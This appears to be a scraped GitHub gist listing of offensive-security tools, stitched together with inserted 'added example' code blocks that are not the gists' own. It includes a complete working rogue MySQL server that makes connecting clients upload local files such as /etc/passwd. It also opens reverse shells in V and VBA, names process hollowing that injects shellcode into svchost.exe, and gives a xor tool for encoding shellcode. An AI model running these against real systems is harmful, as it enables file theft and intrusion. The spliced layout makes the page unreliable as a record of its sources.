#!/usr/bin/env python3
# Modernized version of https://github.com/Gifts/Rogue-MySql-Server that works without further dependencies.
# However, this technique no longer works by default in most MySQL clients. The ability of the server
# to request local files from the client (LOAD DATA LOCAL INFILE) is usually restricted nowadays and needs
# to be unlocked explicitly using specific parameters in the client config or the connection string.
# The following lines show an example of how to emulate a vulnerable PHP based MySQL client:
#
# php > $db = new PDO('mysql:host=127.0.0.1;dbname=test', 'root', 'root', array(PDO::MYSQL_ATTR_LOCAL_INFILE => true));
# php > $db->query('SELECT user()');
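The protocol exchange the gist relies on, as an added example that is not the gist's own code: a minimal rogue server that advertises CLIENT_LOCAL_FILES in its HandshakeV10 greeting, accepts whatever credentials the client sends, and answers the first COM_QUERY with a LOCAL INFILE request (0xFB + filename) instead of a result set. The capability flag values and packet layouts follow the public MySQL client/server protocol; the listening port, the fake server version string and the default target path are assumptions of this example. The check in handle_client shows the caveat from the comment above: a client that did not set CLIENT_LOCAL_FILES in its handshake response (the modern default, unless something like PDO::MYSQL_ATTR_LOCAL_INFILE is set) will refuse the file request.

```python
#!/usr/bin/env python3
# Added example (not the gist's code): minimal rogue MySQL server that answers
# the first query with a LOCAL INFILE request. Layouts follow the MySQL protocol.
import socket
import struct

CLIENT_LONG_PASSWORD     = 0x00000001
CLIENT_CONNECT_WITH_DB   = 0x00000008
CLIENT_LOCAL_FILES       = 0x00000080   # client must set this to accept file requests
CLIENT_PROTOCOL_41       = 0x00000200
CLIENT_SECURE_CONNECTION = 0x00008000
CLIENT_PLUGIN_AUTH       = 0x00080000
SERVER_CAPS = (CLIENT_LONG_PASSWORD | CLIENT_CONNECT_WITH_DB | CLIENT_LOCAL_FILES
               | CLIENT_PROTOCOL_41 | CLIENT_SECURE_CONNECTION | CLIENT_PLUGIN_AUTH)

def frame(payload, seq):
    """MySQL packet: 3-byte little-endian payload length, 1-byte sequence id, payload."""
    return struct.pack('<I', len(payload))[:3] + bytes([seq & 0xff]) + payload

def build_greeting(scramble=b'A' * 20, version=b'5.7.44'):
    """HandshakeV10 advertising CLIENT_LOCAL_FILES (version string is made up)."""
    p = b'\x0a' + version + b'\x00'               # protocol version 10, server version
    p += struct.pack('<I', 1)                     # connection id
    p += scramble[:8] + b'\x00'                   # auth-plugin-data part 1, filler
    p += struct.pack('<H', SERVER_CAPS & 0xffff)  # capability flags, lower half
    p += b'\x21'                                  # utf8_general_ci
    p += struct.pack('<H', 0x0002)                # SERVER_STATUS_AUTOCOMMIT
    p += struct.pack('<H', SERVER_CAPS >> 16)     # capability flags, upper half
    p += bytes([len(scramble) + 1]) + b'\x00' * 10
    p += scramble[8:] + b'\x00'                   # auth-plugin-data part 2
    p += b'mysql_native_password\x00'
    return frame(p, 0)

def build_ok(seq):
    """OK_Packet: 0x00, affected rows 0, last insert id 0, status flags, warnings."""
    return frame(b'\x00\x00\x00' + struct.pack('<HH', 0x0002, 0), seq)

def build_local_infile_request(path, seq):
    """0xFB + filename, sent in place of a result set: the client uploads that file."""
    return frame(b'\xfb' + path.encode(), seq)

def client_supports_local_files(handshake_response):
    """HandshakeResponse41 starts with the client's 4-byte capability flags."""
    return bool(struct.unpack('<I', handshake_response[:4])[0] & CLIENT_LOCAL_FILES)

def join_file_packets(payloads):
    """The client streams the file as packets and ends the upload with an empty packet."""
    data = b''
    for payload in payloads:
        if payload == b'':
            break
        data += payload
    return data

def recv_exact(sock, n):
    buf = b''
    while len(buf) < n:
        chunk = sock.recv(n - len(buf))
        if not chunk:
            raise ConnectionError('client closed the connection')
        buf += chunk
    return buf

def read_packet(sock):
    header = recv_exact(sock, 4)
    return header[3], recv_exact(sock, int.from_bytes(header[:3], 'little'))

def handle_client(conn, path):
    """Greeting -> accept login -> answer the first COM_QUERY with a file request."""
    conn.sendall(build_greeting())
    seq, response = read_packet(conn)             # HandshakeResponse41 (no TLS offered)
    if not client_supports_local_files(response):
        print('[-] client did not set CLIENT_LOCAL_FILES, it will refuse the request')
    conn.sendall(build_ok(seq + 1))               # any credentials are "correct"
    while True:
        seq, cmd = read_packet(conn)
        if not cmd or cmd[0] == 0x01:             # COM_QUIT
            return b''
        if cmd[0] == 0x03:                        # COM_QUERY, e.g. SELECT user()
            break
        conn.sendall(build_ok(seq + 1))           # COM_INIT_DB, COM_PING, ...: acknowledge
    conn.sendall(build_local_infile_request(path, seq + 1))
    payloads = []
    while True:
        seq, payload = read_packet(conn)
        payloads.append(payload)
        if payload == b'':
            break
    conn.sendall(build_ok(seq + 1))
    return join_file_packets(payloads)

if __name__ == '__main__':
    import sys
    target = sys.argv[1] if len(sys.argv) > 1 else '/etc/passwd'   # assumed default
    srv = socket.socket()
    srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    srv.bind(('0.0.0.0', 3306))
    srv.listen(1)
    print(f'[+] rogue server on 3306, requesting {target}')
    client, addr = srv.accept()
    with client:
        content = handle_client(client, target)
    print(f'[+] {len(content)} bytes from {addr[0]}:\n{content.decode(errors="replace")}')
```

Run it, then connect with the PHP snippet above (or any client with local infile enabled) and issue any query; the server prints the uploaded file. TLS is deliberately not advertised, so a client that insists on an encrypted connection will disconnect instead of logging in.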
@qtc-de
qtc-de / sccm-http.py
Created December 9, 2024 19:31
This script contains a python version of sccm-http-looter (https://github.com/badsectorlabs/sccm-http-looter)
#!/usr/bin/env python3
# This script contains a python version of sccm-http-looter (https://github.com/badsectorlabs/sccm-http-looter)
# The following additional packages may need to be installed depending on the usage:
#
# pip install requests-ntlm (required for authenticated access to SCCM DPs)
# pip install requests[socks] (required for usage over socks proxy)
#
# The script attempts to obtain a package list via HTTP directory listing. However, when dealing
# with large package lists, this is not 100% reliable as the server may cut the amount of entries
@qtc-de
qtc-de / Get-ProcessRedirectionTrustPolicy.cpp
Created October 20, 2022 11:56
Enumerate the ProcessRedirectionTrustPolicy for each running process and print the result.
#include <windows.h>
#include <stdio.h>
#include <tchar.h>
#include <psapi.h>
#include <winnt.h>
#include <winternl.h>
typedef NTSTATUS(*MyNtQueryInformationProcess)(HANDLE, PROCESSINFOCLASS, PVOID, ULONG, PULONG);
int main(int argc, char** argv)
@qtc-de
qtc-de / windows-reverse-shell.v
Created August 16, 2022 19:39
Simple Windows reverse shell based on V. Just an experiment. For educational purposes only!
#flag -lws2_32
#include "winsock2.h"
struct WSADATA {
mut:
w_version u16
w_high_version u16
i_max_sockets u16
i_max_udp_dg u16
lp_vendor_info &string = 0
@qtc-de
qtc-de / findfile.sh
Created May 4, 2022 05:59
Find filenames within zip or jar archives
#!/bin/bash
function usage()
{
NAME=$(basename $0)
echo "Usage: $NAME [filter] [path]"
echo ""
echo "Arguments:"
echo " filter regex filter that is applied to archive contents"
@qtc-de
qtc-de / findstring.sh
Created May 4, 2022 05:58
Search for strings within zip or jar archives
#!/bin/bash
if ! command -v ugrep &> /dev/null;
then
echo "[-] Error: ugrep is not available, but required for this script."
exit 1
fi
function usage()
{
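The two searches that findfile.sh and findstring.sh perform (entry names matching a regex, and lines inside entries matching a regex), as an added example that is not either gist's code. It uses Python's zipfile module instead of ugrep and goes one step further than the scripts' descriptions by descending into nested archives (a jar inside a war), reporting such entries as outer.jar!/inner/path. The archive suffix list, the "!/" separator and the sample war built by build_sample_archive are constructed for this example.

```python
#!/usr/bin/env python3
# Added example (not the gists' code): search entry names and entry contents of
# zip/jar archives, descending into nested archives such as jars inside a war.
import io
import os
import re
import zipfile

ARCHIVE_SUFFIXES = ('.zip', '.jar', '.war', '.ear')   # assumed set of archive types

def walk_archive(data, prefix=''):
    """Yield (virtual path, content) for every file in the archive. Nested archives
    are expanded in place and their entries reported as outer.jar!/inner/path."""
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for info in zf.infolist():
            if info.is_dir():
                continue
            path = prefix + info.filename
            content = zf.read(info)
            nested = info.filename.lower().endswith(ARCHIVE_SUFFIXES)
            if nested and zipfile.is_zipfile(io.BytesIO(content)):
                yield from walk_archive(content, path + '!/')
            else:
                yield path, content

def find_file(data, name_regex, archive_name=''):
    """findfile.sh counterpart: entry paths whose name matches the regex."""
    pattern = re.compile(name_regex)
    prefix = archive_name + '!/' if archive_name else ''
    return [path for path, _ in walk_archive(data, prefix) if pattern.search(path)]

def find_string(data, content_regex, archive_name=''):
    """findstring.sh counterpart: (path, line number, line) for every matching line.
    The regex runs on raw bytes, so binary entries such as .class files are searched too."""
    pattern = re.compile(content_regex.encode())
    prefix = archive_name + '!/' if archive_name else ''
    hits = []
    for path, content in walk_archive(data, prefix):
        for number, line in enumerate(content.splitlines(), 1):
            if pattern.search(line):
                hits.append((path, number, line.decode('utf-8', 'replace')))
    return hits

def scan_directory(root, name_regex=None, content_regex=None):
    """Apply both searches to every archive below root (the scripts' [path] argument)."""
    results = []
    for dirpath, _, files in os.walk(root):
        for name in files:
            if not name.lower().endswith(ARCHIVE_SUFFIXES):
                continue
            full = os.path.join(dirpath, name)
            with open(full, 'rb') as fh:
                data = fh.read()
            if not zipfile.is_zipfile(io.BytesIO(data)):
                continue                                   # wrong suffix, not a zip
            if name_regex:
                results += [(full, p) for p in find_file(data, name_regex)]
            if content_regex:
                results += [(full,) + hit for hit in find_string(data, content_regex)]
    return results

def build_sample_archive():
    """Constructed input: app.war holding WEB-INF/web.xml and a nested WEB-INF/lib/util.jar."""
    inner = io.BytesIO()
    with zipfile.ZipFile(inner, 'w') as jar:
        jar.writestr('META-INF/MANIFEST.MF', b'Manifest-Version: 1.0\n')
        jar.writestr('com/example/Config.class', b'\xca\xfe\xba\xbe' + b'jdbc:mysql://db.internal/app')
    outer = io.BytesIO()
    with zipfile.ZipFile(outer, 'w') as war:
        war.writestr('WEB-INF/web.xml', b'<web-app>\n  <param-value>secret=hunter2</param-value>\n</web-app>\n')
        war.writestr('WEB-INF/lib/util.jar', inner.getvalue())
    return outer.getvalue()

if __name__ == '__main__':
    sample = build_sample_archive()
    print(find_file(sample, r'\.class$', 'app.war'))
    for hit in find_string(sample, r'secret=|jdbc:', 'app.war'):
        print('%s:%d: %s' % hit)
```

Searching bytes rather than decoded text is what makes the jdbc string inside the compiled class file show up; decode only the matching line for display, as done above.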
@qtc-de
qtc-de / xor.py
Last active July 18, 2023 10:18
XOR All The Things! Python script that searches for byte representations within the specified file or input and xors them with the specified key.
#!/usr/bin/env python3
import re
import sys
import argparse
class Xor:
'''
Helper class for performing xor operations.
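What "find byte representations and xor them with a key" looks like in practice, as an added example that is not the gist's code. The two notations it recognises ("\x41\x42" escape runs and 0x41, 0x42 C-array runs), the rule that a lone 0xNN is left alone so ordinary constants are not mangled, the restart of the key at the beginning of every run, and the key syntax accepted by parse_key are all assumptions of this example, not a description of what xor.py itself supports.

```python
#!/usr/bin/env python3
# Added example (not the gist's code): locate byte representations in a text
# and replace each one by its xor-ed counterpart in the same notation.
import re
import sys
import argparse

# Notations handled here (an assumption of this example): "\x41\x42" escape runs
# and "0x41, 0x42" array runs. A single 0xNN is not touched, so constants survive.
ESCAPE_RUN = re.compile(rb'(?:\\x[0-9a-fA-F]{2})+')
ESCAPE_BYTE = re.compile(rb'\\x([0-9a-fA-F]{2})')
ARRAY_RUN = re.compile(rb'0x[0-9a-fA-F]{2}(?:\s*,\s*0x[0-9a-fA-F]{2})+')
ARRAY_BYTE = re.compile(rb'0x([0-9a-fA-F]{2})')

def xor_bytes(data, key):
    """Repeating-key xor; the key wraps around when it is shorter than the data."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))

def _rewrite_run(run, key, byte_pattern, fmt):
    """Xor every byte token inside one run, keeping separators and notation. The key
    index restarts at the beginning of each run, so every blob decodes on its own."""
    plain = bytes(int(t, 16) for t in byte_pattern.findall(run))
    cipher = iter(xor_bytes(plain, key))
    return byte_pattern.sub(lambda m: fmt % next(cipher), run)

def xor_representations(text, key):
    """Replace every recognised byte representation in text by its xor-ed version."""
    text = ESCAPE_RUN.sub(lambda m: _rewrite_run(m.group(0), key, ESCAPE_BYTE, b'\\x%02x'), text)
    text = ARRAY_RUN.sub(lambda m: _rewrite_run(m.group(0), key, ARRAY_BYTE, b'0x%02x'), text)
    return text

def parse_key(value):
    """Key given as hex (0x0badf00d, or an even-length run of hex digits) or as a
    plain string; anything that is not parseable as hex is used literally."""
    stripped = value[2:] if value.lower().startswith('0x') else value
    if stripped and len(stripped) % 2 == 0 and re.fullmatch(r'[0-9a-fA-F]+', stripped):
        return bytes.fromhex(stripped)
    return value.encode()

def main():
    parser = argparse.ArgumentParser(description='xor byte representations found in a file or on stdin')
    parser.add_argument('key', help='xor key, hex (0x41) or literal (secret)')
    parser.add_argument('file', nargs='?', help='input file (default: stdin)')
    args = parser.parse_args()
    if args.file:
        with open(args.file, 'rb') as fh:
            data = fh.read()
    else:
        data = sys.stdin.buffer.read()
    sys.stdout.buffer.write(xor_representations(data, parse_key(args.key)))

if __name__ == '__main__':
    main()
```

Because the output keeps the original notation, a source file can be piped through once to encode its embedded shellcode and through again with the same key to get the original back.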
@qtc-de
qtc-de / swaperoo.py
Last active March 19, 2022 06:31
Swap the case of each ASCII letter within a string and print each possible combination to stdout.
#!/usr/bin/env python3
import string
import argparse
import itertools
from typing import Iterator
def swaperoo(target: str) -> Iterator[str]:
'''
@qtc-de
qtc-de / Win32-ReverseShell.vb
Last active May 25, 2023 13:49
VBA reverse shell that uses Win32 API calls
' ********************************************************************************************************
'
' VBA reverse shell that uses Win32 API calls. Most of the code was copied from the following resources:
'
' * https://stackoverflow.com/questions/8670391
' * https://stackoverflow.com/questions/43197814
' * https://renenyffenegger.ch/notes/development/languages/VBA/Win-API/examples/
'
' The code demonstrates a more complex usage example for calling Win32 API from VBA and should be used
' for educational purposes only. During development I was mainly interested whether the WSAData or the
@qtc-de
qtc-de / DynWin32-ShellcodeProcessHollowing.ps1
Created January 29, 2022 15:17
PowerShell implementation of shellcode based Process Hollowing that only relies on dynamically resolved Win32 API functions
<#
DynWin32-ShellcodeProcessHollowing.ps1 performs shellcode based process hollowing using
dynamically looked up Win32 API calls. The script obtains the methods GetModuleHandle,
GetProcAddress and CreateProcess by using reflection. Afterwards it utilizes GetModuleHandle
and GetProcAddress to obtain the addresses of the other required Win32 API calls.
When all required Win32 API calls are looked up, it starts svchost.exe in a suspended state
and overwrites the entrypoint with the specified shellcode. Afterwards, the thread is resumed
and the shellcode is executed enveloped within the trusted svchost.exe process.